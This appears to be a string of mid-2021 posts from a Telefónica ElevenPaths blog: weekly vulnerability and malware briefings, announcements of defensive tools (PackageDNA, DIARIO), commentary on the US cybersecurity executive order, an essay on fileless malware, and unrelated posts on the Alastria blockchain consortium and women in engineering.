Alastria 3.0: the spanish blockchain consortium

José Luis Núñez Díaz    14 June, 2021

On the June 1st, the Annual Assembly of Alastria, the Spanish Blockchain consortium, was held. Today we are already more than 500 members: companies of all sizes, profiles and industries, public administration or university representatives. As in all assemblies, the new Board of Directors was elected, which will steer the course of the association over the coming years. Beyond names and positions, the newly elected Board reflects the renewal that we want to face in order to adapt the association to the new times. Times in which the economic situation may not be very favourable. Nevertheless, we firmly believe that Alastria has a role to play.

When we founded the association in 2017, we were crystal clear about its purpose. It was not just about setting up another Blockchain consortium. We all believed in the transformative power of technology and its ability to have an impact on society. That is why the aim of the partnership has not only been to carry out projects with distributed and/or decentralised registry technologies (i.e., Blockchain). We have been trying for almost four years to use Blockchain to promote the digital economy and improve Spain’s competitiveness through technology.

Alastria 2.0

Much has been achieved in recent years. Perhaps the most relevant one has been the publication by UNE of the first global standard on decentralised digital identity. This standard is not only inspired by Alastria’s work, but several of our partners have been involved in its development and approval. But there has also been a strong commitment towards international initiatives. In Europe, Alastria collaborates in the definition and design of both EBSI (European Blockchain Services Infrastructure) and ESSIF (European Self-Sovereing Identity Framework). We have also been a major contributor in laying the foundations of INATBA or LACCHAIN, which adopts all of Alastria’s learnings in terms of decentralised governance.

But the usefulness of an association like Alastria is not in the past, but in the future. So, I would like to take this opportunity to share the priorities we are going to work on from now on:

  1. Encourage the adoption of decentralised identity models, placing value on the Alastria ID model.
  2. Make reliable decentralised networks accessible to partners.
  3. Approach to the public sector.
  4. Reinforce the role of the association as a forum for SMEs and large companies.
  5. Explore alternative financing models that guarantee the sustainability of the association and the collaboration of its members.

Identity

We have already spoken in this blog about Self Sovereign Identity (SSI). As we said, Spain can be proud to be the first country in the world with a standard on this concept. Recently, the European Commission announced the creation of a European digital identity. In short, Digital Identity is in fashion and Alastria is in an unbeatable position to help its partners to benefit from it.

Over the next few years, we will work hard to make it possible for anyone to use their Digital Identity for all kinds of online transactions. We are not just thinking about authenticating you to a third party while keeping your privacy easy, secure and in control of your data. We want to enable the use of that identity on a massive scale in the economy. It should enable you to rent a bike, pay taxes or open a bank account.

As a consequence, the identity model itself is not an end, but a mean and a very powerful enabler of new use cases. We are going to work on this identity model along three lines of action:

  1. Dissemination and adoption: facilitating the knowledge of the Alastria_ID model among partners and encouraging them to use it in their services, especially among public administrations in order to make it the reference model for digital authentication of citizens before the administration.
  2. Technology: Alastria_ID is a work in progress. We will evolve and strengthen it by improving the consumption tools and facilitating its accessibility. We will also work on its interoperability with other solutions such as ESSIF and LACChain.
  3. Ecosystem and partnership: we will promote the internationalisation of the UNE standard based on the Alastria_ID model, proposing its adoption in organisations such as CEN/CENELEC, ETSI, ITU, ISO, etc. We will also promote the inclusion among the Hyperledger projects, the de facto standard for Blockchain in the business environment.

Networks and Platforms

We want the founding aspiration of the Association to become a reality. We must build a permissioned public ecosystem with guarantees available to any company that wants to deploy decentralised applications.

Alastria is technology agnostic and guarantees the quality standards and regulatory compliance of the networks promoted by its members. The Association does not operate networks, but it does ensure that partners can choose between different alternatives to deploy their use cases. Each use case has different functional and operational requirements related to their business. This is why we will create the “Alastria Compliant” network decalogue. This decalogue will include basic criteria for operation, onboarding, documentation, evolution, interoperability and services (e.g., Alastria ID).

The last point, interoperability and services, is absolutely crucial. Not only do Alastria’s networks need to connect in a so-called native way with the services of the European infrastructure under development, EBSI, but also with the growing number of Blockchain National Networks (BNNs) that are constantly appearing, promoted by or with the participation of governments.

All networks with this status will comply with the governance, best practice and interoperability policies established by Alastria and its partners through the working groups. The Alastria Compliant status should ensure that, for example, the evidence recorded in that network has full legal validity. It has no influence on the technology implemented, the specific operating model or the number of members.

On the other hand, it will be key for partners to have access at all times to a network with the most relevant technologies in the industry. Consequently, the development of new networks with new technologies will be promoted, including, if possible, a public network in collaboration with public authorities.

Public Sector

More than 50 public administrations (local, regional or state) are represented in Alastria. However, blockchain is still far from being a commonly adopted technology in the public sector. Therefore, it is necessary for the Association to continue to act as an evangelist of blockchain technology among the different administrations.

Alastria must become the meeting point for Public Administrations that need the technology developed in Alastria. To this end, we will put special focus on providing visibility to the Public Administrations of all the projects that the partners carry out and how they can be of interest to them. As a first example and spearhead, we will encourage public-private cooperation in the development of identity projects. We will promote those partners who are already involved in these projects can incorporate the public sector as a stakeholder. As a result, we will ensure that the partners’ technology helps to improve the way citizens and businesses interact with the Administration.

In short, we have a brilliant opportunity to take advantage of the work we have done and strengthen Spain’s position in Blockchain technology.

Ecosystem And Collaboration Between SMEs And Large Companies

There is no company profile required to be an Alastria partner. You don’t even have to be a Blockchain company to be a partner of Alastria. We encourage any public or private company to join and to collaborate with academic institutions and professional entities. It doesn’t matter the size, the economic sector where it develops its activity, the technological profile or its geographical location. All Alastria members have the same status, the same responsibilities and the same benefit.

But the real value of Alastria’s ecosystem develops when partners collaborate. That is why we will continue to encourage collaboration between companies with different profiles. We will launch a new Open Call with the support of large companies, administrations, incubators/accelerators and investors as the backbone of this objective. This time, the challenges posed will be aligned with the lines defined for Spanish and European funds. We hope that this measure will allow the partners to benefit from new financing channels.

Financing

Alastria is a non-profit association and we commit all our resources to transferring value to our members. With this objective, numerous initiatives have been launched in recent years to link and make visible the value propositions of our members with open innovation ecosystems, accelerators and public institutions. Many opportunities have been created for Alastria’s SMEs to present their use cases and have visibility in national and international forums and conferences. But perhaps the most relevant initiative has been the Project Table. Its purpose is to gather, bring together and evaluate the projects of the partners with a view to the Next Generation funds of the European Union. In short, the aim is to dynamise the ecosystem and promote collaborative models that maximise the return for the partners while optimising the association’s resources to the maximum.

From another perspective, Alastria should encourage the use of available networks by exposing use cases among partners. During the coming months, we will try to analyse the 47 use cases deployed in Alastria networks and published in order to proactively approach them. Additionally, we will analyse the implementation in Alastria networks of a monetisation/licensing mechanism by partners of the use cases deployed in Alastria networks. This mechanism will enhance the sustainability of the networks and provide an additional incentive for partners to deploy and share their use cases.

Cyber Security Weekly Briefing June 5-11

ElevenPaths    11 June, 2021

Microsoft’s monthly bulletin

Microsoft has released its June security bulletin, which fixes 50 vulnerabilities, including remote code execution (RCE) flaws, denial of service issues, privilege escalation and memory corruption issues. Five of the fixed vulnerabilities would allow remote code execution: CVE-2021-33742 (0-day that was in active exploitation), CVE-2021-31963CVE-2021-31967CVE-2021-31959CVE-2021-31985.

Also noteworthy among the security updates are patches for seven 0-days, six of which were being actively exploited:

  • CVE-2021-33742 (CVSS 7.5): remote code execution vulnerability in the Windows MSHTML platform.
  • CVE-2021-33739  (CVSS 8.4): Microsoft DWM core library privilege escalation vulnerability.
  • CVE-2021-31199 and CVE-2021-31201 (CVSS 5.2): Microsoft enhanced cryptographic provider privilege escalation vulnerabilities.
  • CVE-2021-31955 (CVSS 5.5): Windows kernel information disclosure vulnerability.
  • CVE-2021-31956  (CVSS 7.8): Windows NTFS privilege escalation vulnerability.
  • CVE-2021-31968 (CVSS 7.5): Denial of Service vulnerability in Windows Remote Desktop Services. This is the only fixed 0-day for which there is no evidence of exploitation.

More info: https://msrc.microsoft.com/update-guide/en-us

New PuzzleMaker campaign uses 0-days string in Chrome and Windows 10

Researchers have discovered a new group called PuzzleMaker, which would be using a 0-days string in Google Chrome and Windows 10 in attacks that are highly targeted against companies around the world. The campaign has been active since mid-April, when the first victims’ systems were compromised. The 0-days exploit chain deployed in this activity exploits a remote code execution vulnerability in Google Chrome V8 Javascript to gain access to the system. The attackers then used a privilege escalation exploit to compromise the latest versions of Windows 10, exploiting a vulnerability in the Windows kernel (CVE-2021-31955) and another privilege escalation flaw in the Windows NTFS (CVE-2021-31956), both of which have already been patched. After using the Chrome and Windows exploits to gain an access point to the victim’s system, PuzzleMaker deploys and executes four additional malware modules from a remote server. First, a stager is deployed to notify that the exploit was successful, as well as to deploy and execute a more complex dropper, which in turn installs two executables, which pretend to be legitimate Windows operating system files; the second of these is a remote shell and can be considered the main payload of these attacks. No similarities have been identified between the malware used and any known malware.

Chrome Bulletin – New 0-day actively exploited

Google has published its monthly bulletin for the month of June in which several security flaws have been fixed in its Chrome browser for Windows, Mac and Linux. Among these flaws is a new high-severity 0-day, identified as CVE-2021-30551, which, according to the company itself, is being actively exploited. Meanwhile, Google employee Shane Huntley has published a tweet in which he confirms that this exploit is being used by the same group that has been linked to the exploitation of the 0-day CVE-2021-33742 in the Edge browser fixed by Microsoft this week. This new 0-day is derived from a type-confusion error in its V8 open-source engine and allows a remote attacker, via a specially designed website, to trick the user into accessing it and thus exploit this flaw and execute arbitrary code on the victim’s system. In addition, the new bulletin also highlights a critical use-after-free vulnerability in the BFCache optimisation system (CVE-2021-30544).

Learn more: https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html

New groups exploit old SonicWall VPN vulnerabilities

CrowdStrike’s incident response team has found out that ransomware operators are exploiting an old vulnerability in SonicWall VPN (CVE-2019-7481 CVSS 7.5) that affects Secure Remote Access SRA 4600 devices in a number of incidents. The ability to exploit this vulnerability against SRA devices has not been previously reported, and it would be affecting versions prior to 10.x, although it was officially published that only versions prior to 9.0.0.3 were affected, since the latest versions of the Secure Mobile Access (SMA) firmware no longer mitigate this CVE for SRA devices. Likewise, in February 2021, SonicWall’s PSIRT broke down a new 0-day (CVE-2021-20016 CVSS 9.8) affecting its SMA 100 appliances that required updates to versions later than 10.x. Regarding this vulnerability, SonicWall did not mention whether it affected older SRA VPN appliances that were still in production environments, as they are considered to be beyond their useful life. This CrowdStrike analysis has focused on the 2019 vulnerability as there are public proofs of concept for it and they claim that they do not want to provide information that could be used by attackers, as the 2021 vulnerability has no public PoCs at this time.

Full info: https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/

Siloscape: ​the first malware targeting Windows containers

PaloAlto researcher Daniel Prizmant has detailed the first malware campaign targeting Windows containers. In July 2020 a technique for escaping Windows containers in Kubernetes and accessing the container cluster was made public, although Microsoft did not initially recognise it as a vulnerability as they argued that containers should not be used as a security measure, they eventually had to acknowledge the flaw by allowing it to escape from a container to the host without administrator permissions (CVE-2021-24096). The new malware called “Siloscape” aims to exploit Kubernetes via Windows containers, implanting a backdoor into misconfigured Kubernetes clusters to run malicious containers with cryptocurrency mining functionality or exfiltrate information from applications running in the cluster. The initial attack vectors in the containers have been mainly web vulnerabilities such as CVE-2020-14882, vulnerable PHP applications, SQL injections, or vulnerable Redis services.

More details: https://unit42.paloaltonetworks.com/siloscape/

When I grow up I want to be… Engineer

ElevenPaths    10 June, 2021

“What do you want to be when you grow up? A classic. So simple, yet so complex, and curiously so often asked when we are just kids… when perhaps we should ask this question ourselves every day (but we will talk about that another day). In my case, as a kid, I was pretty clear, I wanted to be a “painter, like Picasso”. Although it is true that, in general, I was always curious about any subject and I enjoyed telling my parents and my brother what I had learnt. I even played at being a teacher and made-up exercises, I would say it was one of my favourite games. I never gave it much more thought and I didn’t do wrong, after all I was a kid, the important thing was to play.

Then one day, my parents bought a computer. I was fascinated. I was especially captivated by a certain application that allowed you to make infinite drawings, colouring with a simple “click” and making shapes, and of course typing and writing infinite letters on a screen. And of course, video games (and playing them).

I didn’t think much more about it, until it was time to decide what to study: would I then fulfil my childhood idea of being a painter or a teacher? Although I wasnt totally sure, I thought that studying engineering might be fun, especially if it was related to computers. Actually, I didn’t know what kind of job I would have afterwards (hands up if you knew), but I made my bet (Telecommunications Engineering) and I think I was right. I enjoyed doing the degree, but at the end I wondered if I could go further, it was hard to think that the road had ended up there. I went through several jobs… and that’s when I started to fit the pieces together and decided that what I would really enjoy was being an engineering teacher (2 in 1). Although the road towards this was particularly tough, I decided to go back to university again, this time to do my PhD. And I finished it, but not before travelling to many countries for conferences and research stays, meeting a lot of people, and continuing to learn (and play). I made it! I am now a professor of engineering at the University of Alcalá. But no, this is not yet the end, it is just another stage in my journey. And for now, in engineering I have found a motivating landscape, full of logic games and challenges, full of tears some days, but big smiles on others. But above all I have discovered that engineering is not only computers, chips and cables… it is also creativity and imagination, it is to be able to solve problems of any kind: technological, economic, social… it is still playing! I am lucky enough to feel like a “painter” even though my tools are not brushes, and I am excited to help, to the best of my ability, to solve the problems and great challenges of the future of society. The only problem is that I will need some help, are you up for it?

We Are Taking Part in The Arsenal Black Hat USA 2021: Hybrid Pandemic Mode On

Innovation and Laboratory Area in ElevenPaths    8 June, 2021

Once again, the ElevenPaths Innovation and Lab team is taking part in the Black Hat USA 2021 Arsenal in Las Vegas to share a new open-source tool with the community. In the context of this year’s pandemic, Black Hat will organise a hybrid event with the possibility to participate on-site and online, or in a fully online mode. It will take place on the 4th or 5th of August, where part of our team, represented by Carlos Ávila, Diego Espitia, Claudio Caracciolo and Franco Piergallini Guida, will be presenting an internal development that will be released publicly in those days, an open-source tool that we have called PackageDNA.

PackageDNA

As malware campaigns embedded in software development packages are steadily increasing, we have identified the need to automate the process of analysing third party packages (pypi, npm, gem, godev, etc.) that we use on a daily basis in our developments without questioning how or what they do internally.

PackageDNA was born to fill this need, giving developers and researchers the ability to do a deep analysis of the packages they use in an automated and massive way. Among its functionalities, it tries to obtain a vast enumeration of the internal features and metadata of the packages, as well as to perform a series of automated analysis such as the search for internal CVEs, or files with malware, but also performs analysis related to typosquatting of the packages and the history of the package developer in the analysed repositories, among other features.

The tool is open-source, free and modular, and has the ability to present the results in different formats, in a visually friendly and centralised way.

As mentioned before, while the tool is being used by our internal team, it will be available for public download after the presentation at the Arsenal so that everyone can enjoy it and contribute to the project openly.

Cyber Security Weekly Briefing May 29- June 4

ElevenPaths    4 June, 2021

Vulnerability in SonicWall Network Security Manager

SonicWall has released security patches to fix a vulnerability affecting local versions of the Network Security Manager (NSM) multi-user firewall management solution. Classified as CVE-2021-20026 and with a CVSS of 8.8, this flaw could be easily exploited without user interaction, although, as a mitigating factor, it is worth noting that you need to be authenticated on the system to exploit it. It affects NSM 2.2.0-R10-H1 and earlier, but not the already fixed NSM versions 2.2.1-R6 and 2.2.1-R6 (Enhanced). Likewise, this vulnerability would only affect on-premises deployments of NSM, with SaaS versions being unaffected. While the company has not indicated that there is any immediate danger of attackers exploiting this vulnerability, SonicWall is urging customers to remediate this flaw immediately.

More details: https://www.sonicwall.com/support/product-notification/security-advisory-on-prem-sonicwall-network-security-manager-nsm-command-injection-vulnerability/210525121534120/

Analysis of the malware used by threat actor Nobelium

Microsoft has published an analysis of the artefacts used in the initial stage of the USAID impersonation campaign by threat actor Nobelium, also known as APT29, which was behind the SolarWinds supply chain attack. There are four new malware families that have been identified:

  • EnvyScout: allows the theft of NTLM credentials from Windows accounts and places a malicious ISO image on the compromised device. This malware has also been identified in a phishing campaign against the Belgian Embassy.
  • Boombox: .exe file included in the ISO that acts as a downloader by downloading the encrypted malicious artefacts from Dropbox. It is also capable of collecting information about the Windows domain to forward it to a remote server in an encrypted form.
  • NativeZone:DLL that acts as a loader and starts automatically when a user logs on to Windows in order to launch CertPKIProvider.dll (VaporRage).
  • VaporRage: DLL that has shellcode download and execution capabilities from C2 servers and with which attackers perform various malicious activities, including the installation of Cobalt Strike beacons.

Learn more: https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

Active exploitation of a 0-day vulnerability in the Fancy Product Designer plugin

An active exploitation campaign of a 0-day vulnerability has been detected in the WordPress Fancy Product Designer plugin, which is currently present in more than 17,000 websites and allows customising the display of products in WordPress, WooCommerce and Shopify. This is a remote code execution and arbitrary file upload vulnerability that does not require user authentication. This flaw has been identified as CVE-2021-24370 (CVSSv3 of 9.8) and affects version 4.6.8 and earlier of the plugin on WordPress, WooComerce and Shopify platforms. However, the researchers state that the attacks are likely to be blocked on Shopify platforms as they have stricter access controls. Complete uninstallation of the plugin is recommended until a patch is available, as it is sometimes possible to exploit this vulnerability even if the plugin is disabled.

All the details: https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/

Distribution of Teabot and Flubot via malicious apps and websites

Since December 2020, several attacks against Android devices with the Teabot and Flubot malware families have been reported. Recently, Bitdefender researchers have identified a new wave of apps that distribute these banking trojans by trying to impersonate the top-rated legitimate apps in the Android store. For its part, Teabot has the ability to carry out overlay attacks through Android’s accessibility services, intercept messages, perform various keylogging activities, steal Google authentication codes and even take full remote control of affected devices. So far, it is targeting several well-known banking institutions such as Bankia, BBVA, Banco Santander or ING Spain, among others. On the other hand, Flubot has had a significant impact in Germany, Spain, Italy and the United Kingdom. The entry vector for this banking trojan continues to be SMS messages that try to impersonate parcel delivery companies such as DHL, FedEx or Correos. Flubot has the ability to steal bank details, contacts, SMS and other private data. It is also capable of executing other available commands, including sending SMS with content provided by the C2 server.

Learn more: https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/

Epsilon Red: new ransomware exploiting Microsoft Exchange Proxylogon vulnerabilities

​Sophos researchers have discovered a new ransomware, named Epsilon Red, after investigating an attack on an unidentified major US hospitality company. According to the researchers, the entry vector used by the threat actors was the exploitation of Proxylogon vulnerabilities, due to the company’s failure to apply security patches to protect its IT infrastructure, regarding its Microsoft Exchange servers. After gaining network compromise, the malicious actors gain access via RDP and use Windows Management Instrumentation (WMI) to execute software and PowerShell scripts to ultimately deploy the Epsilon Red ransomware. As for the characteristics of this new malware, it is written in Goland and has different PowerShell scripts with functionalities such as killing processes on the victim’s devices or disabling security solutions, among others. Although the origin of this threat is unknown and the name, along with the use of this tool, are unique to this attacker, the ransom note is very similar to that of the REvil ransomware.

More info: https://news.sophos.com/en-us/2021/05/28/epsilonred/

And the President Said, “Enough Is Enough”. The New Cyber Security Proposals from The White House

Sergio de los Santos    4 June, 2021

Joe Biden has signed an Executive Order to improve national cyber security and protect federal government networks more efficiently. The attack on oil pipeline operator Colonial Pipeline, a story that made the mainstream media, was the last straw. Although the cybersecurity industry could sense that the ransomware would end up attacking critical infrastructure and causing chaos, it has taken the threat to materialise for a reaction to occur. And hopefully it will have beneficial consequences. Cyber security already has another game-changing attack in its history to remember.

Negative events capable of changing the laws, the paradigm or the collective awareness of an industry can be counted on a single hand. In cyber security, perhaps (without wanting to complete all the cases) we can talk about Blaster and Sasser in 2003, which completely changed the perception of security at Microsoft, which was already quite damaged. Stuxnet in 2010 warned us about cyberweapons and made the world aware of the new cyber and geopolitical strategy. And of course, Wannacry in 2017, a blow to the industry’s pride for being attacked at that point by a worm that exploited an already fixed vulnerability. And despite years of dealing with ransomware, it has taken years for the threat to materialise in an impact with serious consequences for the United States to tighten the rules. Because if we think about it, it was the next logical step in the escalation: from attacking users to hijacking SMEs, from SMEs to large companies, from these to organisations and from there, it was assumed, to critical infrastructures. But the incident (along with many others that have followed) has finally prompted the president to react.

This executive order aims to modernise defences but above all to focus on a problem that can still, despite the seriousness of the situation, be mitigated. Fundamentally, the order aims to increase information sharing between the government and the private sector and to improve the ability to respond. The basic action points are:

  • It allows private companies (especially those hosting servers) to share information with the government. This will speed up the investigation process when incidents occur involving access to a server. They also have a maximum time limit for reporting such incidents.
  • Improve and adopt cyber security standards in the federal government. This is a commitment (at a high level, although specific technologies are mentioned) to adopt the best standards (2FA, cryptography, SDLC…) from within the government’s own infrastructure.
  • Improve supply chains, as the SolarWinds attack has taught us. Software sold to the government will have to meet minimum security requirements. There will be a kind of certificate of accreditation, similar to that for energy or emissions.
  • A private and public cyber security review board or commission. When an accident occurs, it will be managed and conclusions will be drawn in a coordinated manner. This commission is inspired by the one already in place in aeronautics, where the private and public sector meet after major air incidents.
  • A standard incident response system will be created both internally and externally. Companies will no longer have to wait for something to happen before they know what needs to be done.
  • Improve the defence capability of the federal network. Perhaps the most generic measure, which aims to reinforce with appropriate cyber security tools the entire government infrastructure.
  • Improving remediation and investigation capacity. Perhaps this comes down basically to improving logging systems.

And now, What?

This executive order will mean that companies will have to comply with minimum standards, procedures, audits… In short, it will create a healthier industry, one that is more closely monitored by itself. More robust and united, we hope. Something similar to what the debit and credit card companies did when they implemented the PCI-DSS initiative, which obliged everyone who worked with this data to pass a minimum audit. While it will not solve the problem entirely, it will significantly improve it. It puts the focus on cyber security at the highest level, joins forces and, as mentioned, attacks the problem from a political and legal perspective that complements the technical approach, which is insufficient on its own.

However, there is still a lack of clearer laws against attackers which would make it easier to prosecute them, identify them and impose sanctions at a global level. There is now political and legal support to promote security from a technical point of view, but cyber is also legal, social, political… and the activity of attackers must be tackled from all these angles. Such a serious problem, although technical in nature, cannot be solved from only that angle. If we merely concentrate on patching and responding, auditing and certifying, we will not make enough progress. In any case, this order is great news and a first step in that direction.

#LadyHacker: for yourself and for them

ElevenPaths    2 June, 2021

The end of the academic year has arrived and with it the university admission exams. Young girls and boys in search of a final goal after so many years of effort that was not so heterogeneous a long time ago.

How many of our grandmothers were unable to opt for higher education? Smart, strong and courageous women who put aside their dreams and university aspirations to look after and educate new generations.

To honour them, our role models for life and achievement, #LadyHacker, Telefónica’s global initiative that aims to make the role of women in the technology sector more visible and raise awareness among our girls about their potential to study STEM careers, is releasing the third video of its 2021 campaign. PLAY!

Will you join the #LadyHacker initiative? WE ARE WAITING FOR YOU!

DIARIO: One More Weapon in Thehive’s Arsenal

Andrés Naranjo    1 June, 2021

We already know that the weakest link in the cyber security chain is the user. Studies show that the main reason why a cyber-attack on a company is successful is because of the email entry vector. The whole disaster often starts with an email with an attached file.

Therefore, Telefónica Tech has developed a technology that tackles the problem of analysing office documents in a totally innovative way: DIARIO. Now, the famous cyber security incident response platform (SIRP) TheHive, has included the possibility of integrating DIARIO in its systems.

DIARIO is a technology 100% developed by the ElevenPaths Innovation Area and Laboratory. It is part of the new Telefónica Tech, whose artificial intelligence engine is capable of scanning documents to detect signs of malicious code used by cybercriminals, giving the user a quick and convenient verdict about its danger.

DIARIO: Not Another Antivirus

DIARIO’s ability, using artificial intelligence, to detect common elements used to introduce malicious code into office documents is extremely useful in those areas where the antivirus cannot help, making it a truly effective detection task. DIARIO does not try to replace traditional antivirus, it complements them by doing a totally different type of analysis on everything that has not been able to be detected by traditional antivirus methodologies, usually based on signatures. DIARIO is very effective in what ” escapes ” the detection of antivirus software.

Privacy as The Core of DIARIO’s Design

DIARIO is entirely focused on business use and therefore, given the possibility of document confidentiality, it has been designed for confidentiality. Often, in case of suspicious files, employees use as additional virus-free validation online file scanning platforms that record and store both the information and metadata of those documents they receive. This can pose a serious privacy problem because of the sensitive or confidential content stored in these documents. DIARIO, however, only extracts those parts of the documents that could be suspicious to be analysed, and never the content of the document itself. So the sensitive or confidential information contained in the document does not circulate or is not stored in any way outside the corporate environment, maintaining the privacy of that information.

TheHive

DIARIO’s trained artificial intelligence is also available for use or integration through other tools or technologies thanks to its developer interface (API). This is why it is very useful as part of TheHive.

TheHive is a cyber security incident response platform (SIRP) that is responsible for receiving alerts from all our cyber security technologies (SIEM, IDS/IPS, firewalls, etc…). TheHive is a highly automated platform and ready to be integrated with other technologies to improve its efficiency and functionality. In this way, from TheHive, using DIARIO’s artificial intelligence, we can directly scan suspicious files that arrive attached to an alert, thus making a quick and direct analysis of the content of office files that allow an automatic early warning in case of malicious files.

DIARIO is a cross-platform solution that runs on Windows, Linux and MacOS, and can be run directly in the cloud, from the Office365 webmail client as well as in the Outlook desktop application.

You can test DIARIO’s document analysis capabilities quickly and easily from its website: diario.elevenpaths.com.

If you are interested in enjoying the benefits of DIARIO in any of its forms, you can contact Telefónica Cybersecurity & Cloud Tech by filling in the related form on the DIARIO site: diario.elevenpaths.com or in the following email: [email protected].

Cyber Security Weekly Briefing May 22-28

ElevenPaths    28 May, 2021

Windows HTTP protocol stack vulnerability also affects WinRM

Security researchers have discovered that the vulnerability affecting the Windows IIS web server (CVE-2021-31166, CVSS 9.8), which resides in the HTTP protocol stack – http.sys – responsible for processing requests, can also be exploited to attack systems that expose the WinRM (Windows Remote Management) service, allowing unauthenticated attackers to execute arbitrary code. This vulnerability only affects Windows 10 and Windows Server versions 2004 and 20H2. It is worth noting that while this service is disabled in Windows 10 versions, it is enabled by default in Windows Server versions. Although there is no publicly available proof of concept for executing arbitrary code using this vulnerability, researchers have published a proof of concept for performing denial of service attacks by sending a single packet.

More info: https://www.bleepingcomputer.com/news/security/wormable-windows-http-vulnerability-also-affects-winrm-servers/

​​​0-day vulnerability at Apple

Apple has published a security bulletin in which it fixes several security flaws, including a 0-day vulnerability affecting its macOS desktop operating system. Among the vulnerabilities addressed, the 0-day vulnerability, discovered by the security firm Jamf and catalogued as CVE-2021-30713, refers to a bypass flaw in the macOS TCC framework and has been exploited for at least a year by the group that operates the XCSSET malware. To distribute the sample, the XCSSET operators would hide the malicious code in Xcode projects on Github, pretending to be legitimate Apple scripts in order to circumvent the macOS Transparency and Control Check (TCC). Another vulnerability, discovered by the ZecOps research team and identified as CVE-2021-30741, has also been fixed, affecting iOS systems and allowing malicious code to be processed. Apple recommends updating the affected systems to the latest versions to solve the security problems.

All the details: https://support.apple.com/en-us/HT201222

Update: new espionage campaign based on Pulse Secure vulnerabilities exploitation

On 20 April, FireEye researchers published the discovery and analysis of an espionage campaign exploiting vulnerabilities in Pulse Secure VPN devices by alleged Chinese threat actors. Now, a month later, the researchers have continued to gather information from their findings. Flare’s reverse engineering team has identified 4 new malware families related to UNC2630, specifically designed to manipulate Pulse Secure devices, called BLOODMINE, BLOODBANK, CLEANPULSE and RAPIDPULSE. In addition, CISA has updated its alert to include new threat actor’ s TTPs, IoCs and updated mitigation measures. Ivanti’s security incident response team has released a new tool to improve the integrity of Pulse Connect Secure software.

Learn more: https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html

​​Malvertising campaign using AnyDesk software

CrowdStrike’s Falcon Complete team has published an analysis of a malvertising campaign using AnyDesk remote desktop software as a decoy. The operators of the campaign have reportedly made use of Google’s advertising platform to impersonate the legitimate AnyDesk website, appearing in searches before ads for the legitimate software itself. Through the fake website, users would download the AnyDesk installer, which has been previously compromised with malicious functionality. The researchers suggest that around 40% of the clicks on these malicious Google ads resulted in installations of the compromised AnyDesk binary, while in 20% of the installations the threat actors communicated directly with the victims’ computers to assign tasks or execute commands.

Full information: https://www.crowdstrike.com/blog/falcon-complete-disrupts-malvertising-campaign-targeting-anydesk/

Fileless Malware: A Growing but Controllable Attack

Diego Samuel Espitia    25 May, 2021

For some years now, WatchGuard has been generating a report on the security situation detected on the Internet. Following the acquisition of Panda, this report has become even more important, as it contains endpoint detections, allowing for a broader security spectrum that provides more detail on the types of incidents that have occurred on the Internet.

Hence, the latest report has shown a fairly significant increase in fileless malware attacks, known as fileless malware, which we have been talking about for a few years now due to the danger they entail and their difficult detection, something that criminals are evidently taking advantage of, seeing an increase of around 900% in the use of this attack technique if we compare the samples reported between 2019 and 2020.

Origin

This problem is almost as old as operating systems. The first example of this type of threat was in 1987 with the so-called Lehigh Virus, which got its name because it was developed at Lehigh University during computer science tests. However, it did not damage the system and was removed with the restart of the computer, as it simply stayed in the RAM and with each execution or call of COMMAND.COM it increased a counter that consumed the memory and therefore made the processes in the machine more and more slow.

But this development achieved a milestone in terms of attacks, which always had the premise of being able to host the malicious segment to be executed on the hard disk, something that exposes any antivirus system to detect the malicious characteristics of the software. In this way, by not having to reach the hard disk, but only being in the memory, it gave them an advantage in terms of not being detected but left them very little margin for action in the development of sophisticated attacks that required extensive code.

How Are These Attacks Carried Out?

Nowadays, toolkits such as PowerSploit and CobaltStrike have allowed criminals to develop much more advanced and precise fileless malware without having to know the full details of how the system works. An example of this is how PowerSploit can inject a DLL with a simple command, generating sophisticated and simple DLL hijacking attacks.

This has been extensively analysed in the MITRE ATT&CK matrices, which even has an analysis of PowerSploit, so that defence teams know in advance what capabilities this kit gives the attacker and in which specific technique this type of attack is used.

Even within our team, a framework was developed that allows corporate attack and defence teams to carry out investigations and detection of possible security breaches using UAC-A-Mola, which has several types of automations to bypass user authentication controls on Windows systems, mainly using fileless attacks.

How Can We Defend Ourselves?

Regarding the defensive side, the advances that Windows has achieved to contain this threat are increasingly useful and require less complex deployments within network schemes in organisations, as we have discussed on previous occasions in our blog, the capabilities that have been achieved with AMSI are undoubtedly a fundamental complement to achieve protection against the imminent increase in fileless attacks.

However, in most organisations the controls provided by this native operating system tool are not implemented, so that any incoming flow could be analysed and any anomalies be detected. An example of the capabilities provided by AMSI are those we have achieved with the AMSIext browser extension, which provides a connection between the browser and AMSI, so that all potential scripts contained in a website are analysed by this engine, detecting any possible anomaly even if the hard disk is not touched in its execution.

Another way typically used by criminals to execute fileless attacks is to combine this attack with the execution of macros in office documents, which allow the use of macro programming capabilities to download and assemble malicious code into memory, delaying detection by traditional anti-virus systems and making detection complex for endpoint systems.

Case Study

Attacks such as those generated by IcedID, show how this technique is very beneficial for attackers and integrates the power of fileless within the techniques, using powershell as a tool for downloading and installing the malicious DLLs, making their actions almost undetectable by antivirus, as seen in the VirusTotal analysis image.

Using our DIARIO tool, we isolate these macros for analysis and detection of malicious processes, so that they can also be integrated into the flow of analysis that should be done on the files that are received by an organisation in order to mitigate this type of attack. Continuing with the analysis of IcedID, we can see that the extraction and analysis of the macros made with DIARIO, indicate that they are suspicious of malware and show us the three macros used for that purpose.

As can be seen, although the increase in these attacks is exponential, the effectiveness of the attacks can be mitigated with several actions:

  • The implementation of appropriate controls at all network terminals.
  • The integration of systems’ own tools with extensions, or developments that make use of these capabilities without the need for manual implementations.
  • Proper training and awareness of the personnel on how to proceed to ensure that these tools are effective in detections and are not missed due to poor handling practices.